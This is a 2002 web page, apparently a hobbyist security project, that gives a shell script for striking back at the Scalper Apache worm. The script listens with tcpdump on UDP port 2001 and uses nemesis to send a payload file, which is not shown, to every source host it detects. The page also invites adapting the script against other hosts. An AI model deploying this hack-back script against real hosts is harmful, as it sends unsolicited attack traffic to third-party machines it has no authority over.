mollat.de/security - projekte - apache-worm
From Saturday on, we decided to actively defend ourselves against the worms. After many hours of research we finally wrote a shell script that "shoots" at the attacking worms at a specific way, letting themselves die...
#/bin/sh # # Script to "shoot off" the bothering apache-worm Scalper # # The script is tested with OpenBSD 2.9 and 3.0 but should run on many more systems. # Before using the script be sure to have installed /usr/ports/net/nemesis and its # dependency, /usr/ports/net/libnet. If you don't know how to do this, please don't # ask me - ask your system administrator. (Thanks ;-) # # Be also sure to have the payload file ("data") in the same dir as this script. # # Unfortunally, there was in every (for me) available version of nemesis a little but # painfull bug. You have to remove the lines 24+25 in the file "nemesis-proto_tcp.c". # They should after your modification look like: # # // else # // payload_s = strlen(payload); # # Recompile it with "make && make install" and make sure the new version appears in # /usr/local/sbin or whereever your port puts it as default. # # One more thing: You can't shoot worms behind a firewall but in my case - their # amount was below 1 percent, _I_ can live with that... # # Use freely as you like. Of course I can't take any warranties for what this software # does - if it robs your bank account - don't blame me for that. If you like - send me # an email if it works for you or not... # # Have fun, Andreas Mollat, Hannover, Germany # # (C) 08.07.2002 Andreas Mollat (wk @ mollat.de) MYIP=184.108.40.206 MYDEV=rl0 PACKET_NUM=1 while true do for IP in `tcpdump -c $PACKET_NUM -lni $MYDEV udp port 2001 \ | sed -e 's/^[^ ]* //1' -e 's/\.2001.*$//1p'` do # -v = verbose # -S = Source IP # -D = Destination IP # -x = Source Port # -y = Destination Port # -P = Payload nemesis-udp -S $MYIP -D $IP -x 2001 -y 2001 -P data echo Shot host: $IP echo $IP >> shot done done
We finished work at Sunday night, as you can see here:
You can download the script here including the packet payload file. I will update this page if it will be necessary and maybe add a FAQ soon. Of course you can use this script with little modification to defend against other DDoS attacks caused by the worm. You just have to get the worm's IP somehow and send it the payload.
Good luck, Andreas Mollat
Credits: Thanks to "Jules" from CCC Hannover for help.